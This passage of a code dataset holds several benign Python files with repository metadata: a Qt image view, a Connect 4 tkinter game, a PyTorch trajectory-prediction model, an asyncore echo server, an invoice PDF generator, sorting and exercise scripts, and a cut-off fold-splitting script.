self.hovered_box:\n if self.resize_type == 1:\n new_tl_corner = (self.pt_2 - self.resize_offset).toPoint()\n if new_tl_corner.x() < 0:\n new_tl_corner.setX(0)\n if new_tl_corner.y() < 0:\n new_tl_corner.setY(0)\n self.hovered_box.setTopLeft(new_tl_corner)\n elif self.resize_type == 2:\n new_tr_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_tr_corner.setX(new_tr_corner.x() + 2 * self.resize_offset.x())\n if new_tr_corner.x() > self.pixmap_src.width():\n new_tr_corner.setX(self.pixmap_src.width())\n if new_tr_corner.y() < 0:\n new_tr_corner.setY(0)\n self.hovered_box.setTopRight(new_tr_corner)\n elif self.resize_type == 3:\n new_bl_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_bl_corner.setY(new_bl_corner.y() + 2 * self.resize_offset.y())\n if new_bl_corner.x() < 0:\n new_bl_corner.setX(0)\n if new_bl_corner.y() > self.pixmap_src.height():\n new_bl_corner.setY(self.pixmap_src.height())\n self.hovered_box.setBottomLeft(new_bl_corner)\n elif self.resize_type == 4:\n new_br_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_br_corner.setX(new_br_corner.x() + 2 * self.resize_offset.x())\n new_br_corner.setY(new_br_corner.y() + 2 * 
self.resize_offset.y())\n            if new_br_corner.x() > self.pixmap_src.width():\n                new_br_corner.setX(self.pixmap_src.width())\n            if new_br_corner.y() > self.pixmap_src.height():\n                new_br_corner.setY(self.pixmap_src.height())\n            self.hovered_box.setBottomRight(new_br_corner)\n\n        self.mouse_hline.setLine(0, event.y(), self.scene().width(), event.y())\n        self.mouse_vline.setLine(event.x(), 0, event.x(), self.scene().height())\n\n        if self.enabled_observations and not self.resize_type:\n            for uuid, enabled in self.enabled_observations.items():\n                if enabled:\n                    hov_box_item = self.observation_map[uuid].metadata['box_manager'].get_box_hovered(event.pos())\n                    if hov_box_item:\n                        self.hovered_box = hov_box_item.source\n                    else:\n                        self.hovered_box = None\n\n        self.redraw()\n\n    def mouseDoubleClickEvent(self, event: QMouseEvent) -> None:\n        if self.pixmap_src:\n            self.pt_1 = None\n            self.pt_2 = None\n            for uuid, enabled in self.enabled_observations.items():\n                if enabled:\n                    self.observation_map[uuid].metadata['box_manager'].check_box_click(event.pos())\n\n    def resizeEvent(self, event: QResizeEvent) -> None:\n        self.redraw()\n\n    def keyPressEvent(self, event: QKeyEvent) -> None:\n        if event.key() == Qt.Key_Up:\n            self.select_prev()\n        elif event.key() == Qt.Key_Down:\n            self.select_next()\n","repo_name":"mbari-org/vars-localize","sub_path":"ui/ImageView.py","file_name":"ImageView.py","file_ext":"py","file_size_in_byte":24552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39628545352","text":"n,m = tuple(map(int,input().split()))\n\nans =[]\nvisited = [False for _ in range(n+1)]\n\ndef print_combination():\n    for e in ans:\n        print(e, end=\" \")\n    print()\n\n\ndef dfs(curr_num, cnt):\n    if curr_num == n+1:\n        if cnt == m:\n            print_combination()\n        return\n\n    ans.append(curr_num)\n    dfs(curr_num+1,cnt+1)\n    ans.pop()\n\n    dfs(curr_num+1,cnt)\n\n    return\n\ndfs(1,0) ","repo_name":"nbbeom/pythonAlgorithms","sub_path":"backtracking/n개중m개뽑기.py","file_name":"n개중m개뽑기.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32589974831","text":"#READ THIS: \n#Repl.it is a little buggy when it comes to tkinter. \n\n####################\n#Code2College Post Assessment Assignment\n#Start Date: Nov 4th, 2022\n#End Date: Nov 12th, 2022\n#Total Time Spent: About 2 Hours\n#Name: Evgeniy Agaev\n#Project Description: Working Connect 4 Game using tkinter gui framework. \n####################\n\n#Take turns between players to play fair. \n\n\nimport random\nimport tkinter\nfrom tkinter import *\nfrom PIL import ImageTk, Image\n\n\n\ndef print_gameboard(): #function to print the gameboard in the terminal\n    for row in gameboard:\n        for col in row:\n            print(col, end=\" \")\n        print(\" \")\n\n\ndef clear_gameboard(): #clears gameboard\n    for row in range(width):\n        for col in range(height):\n            gameboard[row][col] = '-'\n    \n\ndef drop_piece(collumn, player_token): #drops a piece down the column and ends on top of the last piece.\n    for row in range(0, height):\n        if(gameboard[row][collumn] != '-'):\n            gameboard[row -1][collumn] = player_token  \n            return (row - 1) #returns the row the piece was dropped on. 
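\n    #if the loop above finds no occupied cell, the column is empty, so the fallback\n    #below places the token on the bottom row of the board.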
\n            \n\n    gameboard[height -1][collumn] = player_token\n    return (height - 1) #returns the row the piece was dropped on.\n\ndef check_winner(player_token): #checks for the winner\n    for row in range(0, height):\n        for col in range(0, width): \n\n        #The pattern for the \"winning\" combinations (horizontal, vertical, and diagonal) is that they all\n        # have similar starting positions. \n\n\n            if(gameboard[row][col] == player_token): #first iterating through each token checking if the token is one team's.\n                \n                if(row <= 2): #this is to check for all tokens in the top 3 rows of the board. \n                    #this method checks for \"vertical\" lines in 4 lines\n                    \n                    if (gameboard[row][col] == gameboard[row + 1][col]) and (gameboard[row + 2][col] == gameboard[row + 3][col]) and(gameboard[row + 1][col] == gameboard[row + 2][col]):\n                        #checks 4 tiles to see if they won. \n                        return True\n                if(col <= 2): #this is for horizontal lines\n                    if(gameboard[row][col] == gameboard[row][col + 1]) and (gameboard[row][col + 2] == gameboard[row][col + 3]) and(gameboard[row][col + 1] == gameboard[row][col + 2]):\n\n                        \n                        \n                        \n                        return True\n                \n                if(row <=2) and (col <=2): #checking if negative diagonal is the winning combination. \n                    #checks if starts in uppermost left corner. \n                    if (gameboard[row][col] == gameboard[row + 1][col + 1]) and (gameboard[row + 2][col + 2] == gameboard[row + 3][col + 3]) and(gameboard[row + 1][col + 1] == gameboard[row + 2][col + 2]):\n                        \n                        return True\n                if(row<= 2) and (col >=3): #checking if positive diagonal is the winning combination. \n                    #checks if the start is in the uppermost right corner and counts down from there. \n                    if (gameboard[row][col] == gameboard[row + 1][col - 1]) and (gameboard[row + 2][col - 2] == gameboard[row + 3][col - 3]) and(gameboard[row + 1][col-1] == gameboard[row + 2][col -2]):\n                        \n                        return True\n    \n    return False\n\n\ndef play_pressed():\n    \n    global buttons \n    for widget in root.winfo_children(): #destroys all widgets and wipes the screen clean. \n        widget.destroy()\n    root.configure(bg=\"#d9d9d9\") #sets default background color\n    \n    #each of these buttons connects to a row. 
If they are clicked, then they are connected to a \"drop_piece\" function.\n    row_1 = tkinter.Button(root, text=\"Row 1\", command=lambda b= 0 : drop_piece_tkinter(b)) \n    row_2 = tkinter.Button(root, text=\"Row 2\", command=lambda b= 1 : drop_piece_tkinter(b))\n    row_3 = tkinter.Button(root, text=\"Row 3\", command=lambda b= 2 : drop_piece_tkinter(b))\n    row_4 = tkinter.Button(root, text=\"Row 4\", command=lambda b= 3 : drop_piece_tkinter(b))\n    row_5 = tkinter.Button(root, text=\"Row 5\", command=lambda b= 4 : drop_piece_tkinter(b))\n    row_6 = tkinter.Button(root, text=\"Row 6\", command=lambda b= 5 : drop_piece_tkinter(b))\n    buttons = [row_1, row_2, row_3, row_4, row_5, row_6]\n\n#sets up all the buttons in a grid line, and makes them size with the screen.\n    row_1.grid(column=0, row= 0, sticky = tkinter.EW)\n    row_2.grid(column=1, row = 0, sticky= tkinter.EW)\n    row_3.grid(column=2, row= 0, sticky = tkinter.EW)\n    row_4.grid(column=3, row = 0, sticky= tkinter.EW)\n    row_5.grid(column=4, row= 0, sticky = tkinter.EW)\n    row_6.grid(column=5, row = 0, sticky= tkinter.EW) \n\n    root.grid_columnconfigure((0,1,2,3,4,5), weight=1) #adds weight to each of the columns, so they size with the window.\n\n    for i in range(width): #sets the placeholder items in a grid, to create a more \"realistic image\" for the players\n        for j in range(height):\n            placeholder = tkinter.Label(root, image = placeholder_token)\n            placeholder.grid(column=i, row = (j+ 1), pady= 20)\n    \n    \n\ndef drop_piece_tkinter(b): #drops the piece on the screen. \n    global round\n    global buttons\n    \n    \n    if (round + first_player)%2 ==0: #round is set and depending on each round, the game will either drop a red or a black piece.\n        #every round should be different.\n\n        \n        \n        \n        \n\n        player_move = drop_piece(b, 'X') + 1 #sets player move as a value. \n        \n        label = tkinter.Label(root, image=red_token)\n        label.grid(column = b, row= player_move) #places the piece based on the player_move\n        round = round + 1 #increments the round by 1\n        if(check_winner('X')): #checks the winner each round. \n            for widget in root.winfo_children(): #destroys everything on the screen. \n                widget.destroy()\n            root.configure(bg='#c41a1a') #sets background to red\n            win_label = tkinter.Label(root, text=\"Red won\", font=\"Helvetica 25 bold\") #red won label\n            win_label.place(relx= 0.5, rely= 0.5, anchor=tkinter.CENTER) #places label in center\n\n            #a play again button connects to the play_pressed function before. \n            play_again_button = tkinter.Button(root, text=\"Play Again?\", command=play_pressed)\n            play_again_button.place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n            clear_gameboard() #clears the \"data framework\" of the board array. \n        \n    else:\n        player_move = drop_piece(b, 'O') + 1 #drops piece with the black token on the screen and the '0' token in the array. \n        \n\n        label = tkinter.Label(root, image=black_token)\n        label.grid(column = b, row= player_move) #places a black token based on player move. \n        round = round + 1 #increments the round\n        if(check_winner('O')): #checks if black won\n            for widget in root.winfo_children():\n                widget.destroy() #if black won, everything on screen is destroyed\n            root.configure(bg='#525252') #dark grey background. 
\n            win_label = tkinter.Label(root, text=\"Black won\", font=\"Helvetica 25 bold\") #black won\n            win_label.place(relx= 0.5, rely= 0.5, anchor=tkinter.CENTER)\n            play_again_button = tkinter.Button(root, text=\"Play Again?\", command=play_pressed) #play again button\n            play_again_button.place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n            clear_gameboard() #clears the virtual board. \n    \n    \n\n\n\n############## \n\n#really the entire program loop happens below this line. \n#this is the gameboard\ngameboard = [['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-']]\ngameboard_size = width, height = len(gameboard), len(gameboard[0]) #sets width and height of board. \nfirst_player = int(random.randrange(50,101)/50 +0.5) #half chance that black or red is first.\n\nround = 1 #sets the round to be 1\nbuttons = None #buttons for each row. \n\nroot = tkinter.Tk() #entire window\nroot.title(\"Connect 4\") #title\nroot.geometry(\"500x500\") #size of window\nbt_img = Image.open(\"Tokens/Black_Token.png\") #gets the black token png file. \n\nbt_img = bt_img.resize((50,50), Image.ANTIALIAS) #resizes the token to be a little smaller. \n\nblack_token = ImageTk.PhotoImage(bt_img) #sets the black token to be actually used in the program\n\n\n#this section does the same just for a red token.\nrt_img = Image.open(\"Tokens/Red_Token.png\")\nrt_img = rt_img.resize((50, 50), Image.ANTIALIAS)\nred_token = ImageTk.PhotoImage(rt_img)\n\nph_img = Image.open(\"Tokens/Gray_PlaceHolder.png\")\nph_img = ph_img.resize((30,30), Image.ANTIALIAS)\nplaceholder_token = ImageTk.PhotoImage(ph_img)\n ###########################\n\n\nplay = tkinter.Button(root, text=\"Play\", command=play_pressed) #connects the play button to the play pressed event\nplay.place(relx = 0.5, rely= 0.5, anchor=CENTER)#places the play button in the middle. \n\n\nroot.mainloop() #runs the tkinter loop\n\n\n#noticeable bugs to fix later. \n\n#1. The \"tokens\" can be placed one more time than needed, in other words, overflowing. \n#2. the colors seem a little weird. 
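\n\n#possible fix for bug #1 (untested sketch, not wired in): before dropping, check\n#whether the chosen column is already full at the top of drop_piece_tkinter:\n#\n#    if gameboard[0][b] != '-':  #top cell occupied -> column is full\n#        return                  #ignore the click instead of overflowing\n#\n#'b' is the column index the buttons already pass in, so no new names are needed.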
\n\n \n\n \n\n\n\n\n\n","repo_name":"Evgeniy-Agaev/C2C_PostAssessment_Connect4Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18413924914","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Thu Aug 6 18:53:28 2020\n\n@author: Demain Wang\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom utils_TP2Net import hstfutset\n\n''' \nTP2Net for trajectory prediction \n'''\nclass TP2Net(nn.Module):\n def __init__(self):\n super(TP2Net,self).__init__()\n \n # basic setting\n self.HST_LEN,self.FUT_LEN=hstfutset()\n self.input_size=7\n self.hidden_size=128\n self.input_embedding_size=64\n self.batch_size=128\n self.ego_enc_size=64\n self.ego_sur_size=64\n self.num_lat_class=3\n self.num_lon_class=3\n self.atten_output_size_tpa=64\n \n # base function\n self.ip_emb_ego=torch.nn.Linear(self.input_size,self.input_embedding_size)\n self.ip_emb_sur_1=torch.nn.Linear(self.input_size,self.input_embedding_size)\n self.in_lstm_ego=torch.nn.LSTM(self.input_embedding_size,self.hidden_size,1,batch_first=True)\n self.in_lstm_sur=torch.nn.LSTM(self.input_embedding_size,self.hidden_size,1,batch_first=True)\n self.ot_emb_ego=torch.nn.Linear(self.hidden_size,self.ego_enc_size)\n self.ot_emb_sur=torch.nn.Linear(self.hidden_size,self.ego_sur_size)\n \n self.dec_lstm = torch.nn.LSTM(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.hidden_size,1)\n self.op_lat = torch.nn.Linear(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.num_lat_class)\n self.op_lon = torch.nn.Linear(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.num_lon_class)\n self.op=torch.nn.Linear(self.hidden_size,5)\n \n # TPA\n self.TPA=TemporalPatternAttention(self.input_size,self.batch_size,self.atten_output_size_tpa)\n \n # ego_zero\n self.egoempty_enc=torch.zeros((self.batch_size,self.ego_sur_size)).cuda() \n \n # VOI weighting\n self.conv3x3=torch.nn.Conv2d(self.ego_sur_size, self.ego_sur_size*4, (3,3))\n self.conv1x1=torch.nn.Conv2d(self.ego_sur_size, self.ego_sur_size, (1,1))\n \n # activation module\n self.leaky_relu=torch.nn.LeakyReLU(0.1)\n self.relu=torch.nn.ReLU()\n self.softmax=torch.nn.Softmax(dim=1)\n\n def forward(self,ego,pre,fol,lftpre,lftalo,lftfol,rgtpre,rgtalo,rgtfol):\n \n #encoding of ego vehicle\n hst_ego=self.ip_emb_ego(ego) \n _,(hid_ego,_)=self.in_lstm_ego(self.leaky_relu(hst_ego))\n ego_enc=self.leaky_relu(self.ot_emb_ego(torch.squeeze(hid_ego)))\n \n #encoding of sur vehicle\n pre_enc,hst_pre=self.sudveh_enc(pre)\n fol_enc,hst_fol=self.sudveh_enc(fol)\n lftpre_enc,hst_lftpre=self.sudveh_enc(lftpre)\n lftalo_enc,hst_lftalo=self.sudveh_enc(lftalo)\n lftfol_enc,hst_lftfol=self.sudveh_enc(lftfol)\n rgtpre_enc,hst_rgtpre=self.sudveh_enc(rgtpre)\n rgtalo_enc,hst_rgtalo=self.sudveh_enc(rgtalo)\n rgtfol_enc,hst_rgtfol=self.sudveh_enc(rgtfol) \n\n # VOI weighting\n pre=torch.stack((lftpre_enc,pre_enc,rgtpre_enc),2).contiguous()\n alo=torch.stack((lftalo_enc,self.egoempty_enc,rgtalo_enc),2).contiguous()\n fol=torch.stack((lftfol_enc,fol_enc,rgtfol_enc),2).contiguous()\n sur_cs=torch.stack((pre,alo,fol),2)\n \n # VOI conv \n sur_cs=self.leaky_relu(self.conv1x1(sur_cs)) \n sur_conv3x3=self.leaky_relu(self.conv3x3(sur_cs))\n sur_conv3x3=torch.squeeze(sur_conv3x3)\n \n # Temporal pattern attention\n tpa_attention=self.TPA(ego)\n \n # concatenate\n 
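# ego_enc (ego_enc_size=64) + tpa_attention (atten_output_size_tpa=64) + sur_conv3x3 (ego_sur_size*4=256)\n        # gives 384 features, matching the dec_lstm / op_lat / op_lon input width declared in __init__\n        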
enc=torch.cat((ego_enc,tpa_attention,sur_conv3x3),1)\n\n        # maneuver recognition\n        lat_pred = self.softmax(self.op_lat(enc))\n        lon_pred = self.softmax(self.op_lon(enc))\n        \n        # predict the trajectory\n        fut_pd=self.decode(enc)\n        \n        return fut_pd,lat_pred,lon_pred\n    \n    def sudveh_enc(self,veh):\n        \n        #encoding of sur vehicle\n        sur_lin=self.ip_emb_sur_1(veh)\n        _,(hid_veh,_)=self.in_lstm_sur(self.leaky_relu(sur_lin))\n        veh_enc=self.leaky_relu(self.ot_emb_sur(torch.squeeze(hid_veh)))\n        \n        return veh_enc,sur_lin\n\n    def decode(self,enc):\n        \n        #decode the tensor\n        enc=enc.repeat(self.FUT_LEN,1,1)\n        h_dec,_=self.dec_lstm(enc)\n        h_dec=h_dec.permute(1,0,2)\n        fut_pred=self.op(h_dec)\n        fut_pred=fut_pred.permute(1,0,2)\n        fut_pred=outputActivation(fut_pred)\n        \n        return fut_pred\n\n# It can also be used for NLL loss\ndef outputActivation(x):\n    muX = x[:,:,0:1]\n    muY = x[:,:,1:2]\n    sigX = x[:,:,2:3]\n    sigY = x[:,:,3:4]\n    rho = x[:,:,4:5]\n    sigX = torch.exp(sigX)\n    sigY = torch.exp(sigY)\n    rho = torch.tanh(rho)\n    out = torch.cat([muX, muY, sigX, sigY, rho],dim=2)\n    \n    return out\n\n# Temporal Pattern attention for trajectory prediction \n# Adaptation changes have been made \n\nclass TemporalPatternAttention(nn.Module):\n    def __init__(self,input_size_atten,batch_size,output_size):\n        super(TemporalPatternAttention,self).__init__()\n        ''' \n        input: \n            input_size_atten: the size of attention input\n            batch_size: the size of mini_batch\n            output_size: size of ht'\n        '''\n        #basic setting\n        self.input_size_attention=input_size_atten\n        self.atten_hid_size=output_size\n        self.window_length,self.FUT_LEN=hstfutset()\n        self.output_channel=32\n        self.drop_rate=0.3\n        self.batch_size=batch_size\n        \n        #basic function\n        self.in_lstm_attention=torch.nn.LSTM(self.input_size_attention,self.atten_hid_size,1,batch_first=True)\n        self.compute_convolution=torch.nn.Conv2d(1,self.output_channel,kernel_size=(1,self.atten_hid_size))\n        \n        # weights to be registered\n        self.attention_matrix = nn.Parameter(torch.ones(self.batch_size, self.output_channel, self.atten_hid_size, requires_grad=True))\n        self.register_parameter('atten_mat',self.attention_matrix)\n        self.final_state_matrix = nn.Parameter(torch.ones(self.batch_size, self.atten_hid_size, self.atten_hid_size, requires_grad=True))\n        self.register_parameter('final_state_mat',self.final_state_matrix)\n        self.context_vector_matrix = nn.Parameter(torch.ones(self.batch_size, self.atten_hid_size, self.output_channel, requires_grad=True))\n        self.register_parameter('context_vector_mat',self.context_vector_matrix)\n        \n        # weighting init\n        torch.nn.init.xavier_uniform_(self.attention_matrix)\n        torch.nn.init.xavier_uniform_(self.final_state_matrix)\n        torch.nn.init.xavier_uniform_(self.context_vector_matrix)\n        \n        #activation module\n        self.relu=torch.nn.ReLU()\n        self.dropout=torch.nn.Dropout(self.drop_rate)\n        self.leaky_relu=torch.nn.LeakyReLU(0.1)\n    \n    def forward(self,ego):\n        # get the attention input and encode\n        atten_input=ego\n        # atten_input=self.leaky_relu(ego)\n        lstm_hidden,(h_all,_)=self.in_lstm_attention(atten_input)\n        \n        # reshape\n        hn = h_all[-1].view(1, h_all.size(1), h_all.size(2))\n        \n        # conv of tensor of op\n        output_realigned = lstm_hidden.contiguous()\n        hn = hn.permute(1, 0, 2).contiguous()\n        input_to_convolution_layer = output_realigned.view(-1, 1, self.window_length, self.atten_hid_size)\n        convolution_output = self.leaky_relu(self.compute_convolution(input_to_convolution_layer))\n        convolution_output = self.dropout(convolution_output)\n        
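#each Conv2d filter has kernel (1, atten_hid_size), so it spans the full hidden\n        #state of a single timestep; after the squeeze below, convolution_output scores\n        #every timestep against output_channel learned temporal patterns\n        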
#gen attention map\n        convolution_output = convolution_output.squeeze(3) \n        final_hn = torch.zeros(self.attention_matrix.size(0), 1, self.atten_hid_size)\n        input_sur = torch.zeros(self.attention_matrix.size(0), atten_input.size(1), atten_input.size(2))\n        final_convolution_output = torch.zeros(self.attention_matrix.size(0), self.output_channel, self.window_length)\n        diff = 0\n        if (hn.size(0) < self.attention_matrix.size(0)):\n            final_hn[:hn.size(0), :, :] = hn\n            final_convolution_output[:convolution_output.size(0), :, :] = convolution_output\n            input_sur[:atten_input.size(0), :, :] = atten_input\n            diff = self.attention_matrix.size(0) - hn.size(0)\n        else:\n            final_hn = hn\n            final_convolution_output = convolution_output\n            input_sur = atten_input\n        \n        # key queries and get the value\n        convolution_output_for_scoring = final_convolution_output.permute(0, 2, 1).contiguous().cuda()\n        final_hn_realigned = final_hn.permute(0, 2, 1).contiguous().cuda()\n        mat1 = torch.bmm(convolution_output_for_scoring, self.attention_matrix).cuda()\n        \n        #get the scoring function\n        scoring_function = torch.bmm(mat1, final_hn_realigned).cuda()\n        alpha = torch.sigmoid(scoring_function)\n        \n        #broadcast\n        context_vector = alpha * convolution_output_for_scoring\n        context_vector = torch.sum(context_vector, dim=1).cuda()\n        \n        # get ht'\n        context_vector = context_vector.view(-1, self.output_channel, 1)\n        h_intermediate = torch.bmm(self.final_state_matrix, final_hn_realigned) + torch.bmm(self.context_vector_matrix, context_vector)\n        \n        #reshape \n        h_intermediate=h_intermediate.squeeze(2)#128,32\n        \n        return h_intermediate\n\n\n\n\n\n\n\n\n\n","repo_name":"DemianWang/TP2Net","sub_path":"Code/model_TP2Net.py","file_name":"model_TP2Net.py","file_ext":"py","file_size_in_byte":9558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70140840097","text":"class Solution(object):\n    def firstUniqChar(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        dic = {}\n        for i in range(len(s)):\n            if s[i] in dic:\n                dic[s[i]] = -1\n            else:\n                dic[s[i]] = i\n\n        li = [x for i, x in dic.items() if x != -1]\n        li.sort()\n        return li[0] if len(li) > 0 else -1\n","repo_name":"less1226/learningpython","sub_path":"leetcode/387.firstUniqChar.py","file_name":"387.firstUniqChar.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"34029436873","text":"# Sorting algorithms\n# Overlaps with C++ basic-6\n\nimport func\n\ndef main():\n    givenList = [23,45,12,53,125,62]\n    func.QuickSort(givenList)\n    print(\"Result of quicksort is\",givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.MergeSort(givenList)\n    print(\"Result of mergesort is\",givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.HeapSort(givenList)\n    print(\"Result of heapsort is\", givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.RadixSort(givenList)\n    print(\"Result of radixsort is\", givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.SelectionSort(givenList,len(givenList))\n    print(\"Result of selection sort is\",givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.BubbleSort(givenList,len(givenList))\n    print(\"Result of bubblesort is\",givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.InsertionSort(givenList,len(givenList))\n    print(\"Result of insertion sort is\",givenList)\n\n    givenList = [23,45,12,53,125,62]\n    func.CountingSort(givenList,len(givenList))\n    print(\"Result of counting sort is\",givenList)\n\nif __name__ == \"__main__\":\n    
main()","repo_name":"david4270/concepts-python","sub_path":"Algo-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15409773355","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport asyncore\n# import socket\n\nfrom asynchat_echo_handler import EchoHandler\n\n\nclass EchoServer(asyncore.dispatcher):\n \"\"\"Receives connections and establishes handlers for each client.\n \"\"\"\n\n def __init__(self, address):\n asyncore.dispatcher.__init__(self)\n\n self.create_socket(asyncore.socket.AF_INET,\n asyncore.socket.SOCK_STREAM)\n self.bind(address)\n self.address = self.socket.getsockname()\n self.listen(1)\n\n return\n\n def handle_accept(self):\n # Called when a client connects to our socket\n client, address = self.accept()\n EchoHandler(sock=client)\n\n # We only want to deal with one client at a time,\n # so close as soon as we set up the handler.\n # Normally you would not do this and the server\n # would run forever or until it received instructions\n # to stop\n\n self.handle_close()\n return\n\n def handle_close(self):\n self.close()\n","repo_name":"nixawk/hello-python2","sub_path":"asynchat/asynchat_echo_server.py","file_name":"asynchat_echo_server.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"34"} +{"seq_id":"16179317793","text":"# Write a Python program that has 2 arrays in the main function:\n# One containing several elements which are numbers.\n# The other empty.\n# Write another function which accepts a number as a parameter and returns the number doubled.\n# The main function should call this function for each element of the 1st array and populate the 2nd array with the doubled values when the 2nd array is full it should be printed out\n\ndef main():\n oneArr = [1,2,15,7,3,6,23]\n twoArr = timesTwo(oneArr)\n print(oneArr)\n print(twoArr)\n\n\ndef timesTwo(firstArr):\n secondArr = []\n for i in firstArr:\n secondArr.append(i * 2)\n return secondArr\n\nif __name__ == \"__main__\":\n main()","repo_name":"kiehozero/atu-applied-dbs","sub_path":"labs/ex8-q1.py","file_name":"ex8-q1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9065012829","text":"import pandas as pd\nfrom fpdf import FPDF\n\nimport glob\nfrom pathlib import Path\n\nfilepaths = glob.glob('invoices/*.xlsx')\n\nfor filepath in filepaths:\n filename = Path(filepath).stem\n invoice_nr, invoice_date = filename.split('-')\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_font(family='Times', size=16, style='b')\n pdf.cell(w=50, h=10, txt=f'Invoice nr. 
{invoice_nr}', ln=1)\n pdf.cell(w=50, h=10, txt=f'Date {invoice_date}', ln=1)\n\n df = pd.read_excel(filepath, sheet_name='Sheet 1')\n df = df.rename(columns={'product_id': 'Product ID', 'product_name': 'Product Name',\n 'amount_purchased': 'Amount', 'price_per_unit': 'Price per Unit',\n 'total_price': 'Total Price'})\n \n # Add footer to df\n empty_cells = df.shape[1] - 1\n total_row = ['' for x in range(empty_cells)]\n total_price = df['Total Price'].sum()\n total_row.append(total_price)\n df.loc[len(df.index)] = total_row\n\n # Table header\n pdf.set_font(family='Times', style='b', size=14)\n columns = df.columns\n pdf.cell(w=30, h=10, txt=columns[0], border=1)\n pdf.cell(w=70, h=10, txt=columns[1], border=1)\n pdf.cell(w=30, h=10, txt=columns[2], border=1)\n pdf.cell(w=30, h=10, txt=columns[3], border=1)\n pdf.cell(w=30, h=10, txt=columns[4], ln=1, border=1)\n\n # Table content\n pdf.set_font(family='Times', size=12)\n for index, row in df.iterrows():\n \n pdf.cell(w=30, h=10, border=1, txt=str(row['Product ID']))\n pdf.cell(w=70, h=10, border=1, txt=str(row['Product Name']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Amount']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Price per Unit']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Total Price']), ln=1)\n\n pdf.set_font(family='Times', style='b', size=14)\n pdf.cell(w=30, h=8, txt=f'The total price is {total_price}', ln=1)\n pdf.cell(w=25, h=8, txt='PythonHow')\n pdf.image(w=10, name='pythonhow.png')\n pdf.output(f'{invoice_nr}-{invoice_date}.pdf')\n\n\n# print(filepaths)\n\n","repo_name":"be1ia1/udemy-tpmc","sub_path":"app4-invoice-generation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23530340014","text":"import os\nimport pandas as pd\nimport numpy as np\nimport csv\nimport math\nfrom collections import Counter\nBASE_PATH = '/data/amazon'\nTRAIN_CSV = 'train_v2.csv'\n\nLABEL_ALL = [\n 'blow_down',\n 'conventional_mine',\n 'slash_burn',\n 'blooming',\n 'artisinal_mine',\n 'selective_logging',\n 'bare_ground',\n 'cloudy',\n 'haze',\n 'habitation',\n 'cultivation',\n 'partly_cloudy',\n 'water',\n 'road',\n 'agriculture',\n 'clear',\n 'primary',\n]\n\nLABEL_GROUND_COVER = [\n 'blow_down',\n 'conventional_mine',\n 'slash_burn',\n 'blooming',\n 'artisinal_mine',\n 'selective_logging',\n 'bare_ground',\n 'habitation',\n 'cultivation',\n 'water',\n 'road',\n 'agriculture',\n 'primary',\n]\n\nLABEL_SKY_COVER = [\n 'cloudy',\n 'haze',\n 'partly_cloudy',\n 'clear',\n]\n\n\ndef main():\n train_df = pd.read_csv(os.path.join(BASE_PATH, TRAIN_CSV))\n train_df.tags = train_df.tags.map(lambda x: set(x.split()))\n\n count = Counter()\n train_df.tags.apply(lambda x: count.update(x))\n\n for k in count:\n train_df[k] = [1 if k in tag else 0 for tag in train_df.tags]\n\n train_df = train_df[(train_df[LABEL_SKY_COVER].T != 0).any()]\n\n with open('tags_count.csv', 'w') as f:\n w = csv.writer(f)\n w.writerow(['tag', 'count'])\n for k, v in count.items():\n w.writerow([k, v])\n f.close()\n\n tags_only = train_df[list(count.keys())]\n corr = tags_only.corr()\n corr.to_csv(\"corr.csv\")\n\n attempt = 0\n num_folds = 12\n target_counts = {k: (v / num_folds) for k, v in count.items()}\n target_thresh = {k: max(1., v * .20) for k, v in target_counts.items()}\n print(target_counts, target_thresh)\n furthest_fold = 0\n fold_counts = []\n while attempt < 1000000:\n train_df['fold'] = np.random.randint(0, num_folds, 
